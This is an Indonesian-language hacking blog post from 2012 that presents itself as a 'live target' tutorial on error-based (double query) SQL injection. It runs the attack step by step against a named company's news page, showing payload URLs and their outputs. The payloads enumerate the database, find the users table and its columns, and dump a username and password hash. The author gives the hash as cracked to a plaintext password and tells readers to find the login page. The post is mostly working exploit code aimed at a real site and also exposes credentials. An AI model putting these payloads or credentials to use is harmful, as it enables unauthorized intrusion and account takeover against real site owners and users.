SQL Injection Doubel Query Tutorial [LIVE TARGET]

Bismillah...

lansung saja...

target =

http://www.techvision.co.uk/news.php?id=45

coba kasih single kutu..

ntar error dah....

======

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

======

Tu pesen errornya...

cek version mysqlnya

============

http://www.techvision.co.uk/news.php?id=45+and+(select+1+from(select%0Acount(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

>>>>Duplicate entry '5.0.95-log1' for key 1

===========================

cek nama DB nya...

=============

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>>>Duplicate entry 'techvision281009~1' for key 1

=====================================

cari tabel User di dalam db -techvision281009-

===========

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 31,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>NO ERROR

nah disini kita harus mencari dimana tabel usernya...

kita bisa melihat salah satu querynya

>>>>tables where table_schema=database() limit 31,1)

yang ternyata hasilnya blank [tablenya (kurang dari 30) ]

maka kita ubah limitnya tersebut sampai kita bisa menemukan tabel user nya..

disini :

=========

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>>Duplicate entry 'users~1' for key 1

===============================

Disini ane ubah limitnya dari -->>

=database() limit 31,1) MENJADI =database() limit 2,1)

disitulah tabel usernya

oke kita cari colomn user dan pass nya di tabel tersebut..

convert nama tabel nya ke hexa

http://www.swingnote.com/tools/texttohex.php

users : 7573657273

tambahkan 0x di depanya menjadi >>>columns where table_name=0x7573657273

================

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>>Duplicate entry 'username~1' for key 1

itulah columns usernamenya...

kita cari columns pass nya dengan kita naikan limitnya

columns where table_name=0x7573657273 limit 1,1) >>>> columns where table_name=0x7573657273 limit 2,1)

==================

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>>>Duplicate entry 'password~1' for key 1

===========================================

kesimpulan :

[+]columns where table_name=0x7573657273 limit 1,1) >>>> columns usernamenya

[+]columns where table_name=0x7573657273 limit 2,1) >>>> columns pass nya

sekarang kita bongkar semuanya ......

=========================

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x7e,password) as char),0x7e)) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>>>Duplicate entry 'debandy~9679ee7b0e7ddb35b34046a7c76e6e23~1' for key 1

=========================

PERHATIKAN DISINI :

(concat(username,0x7e,password)

disini harus sesuai nama columns nya....

>>>>Duplicate entry 'username~1' for key 1 --->>itu columns usernya "username"

>>>>>Duplicate entry 'password~1' for key 1 --->>itu columns pass nya "password"

udah sekarang tinggal di decrypt aja tu...

9679ee7b0e7ddb35b34046a7c76e6e23 = l674300b

dan cari loginya ....

special thnakz : cyberc0de dan cep khan....

alhamdulillah..

moga bermanfaat

SQL Injection Doubel Query Tutorial [LIVE TARGET] 2012-04-22T19:14:00-07:00 Rating: 4.5 Diposkan Oleh: r007-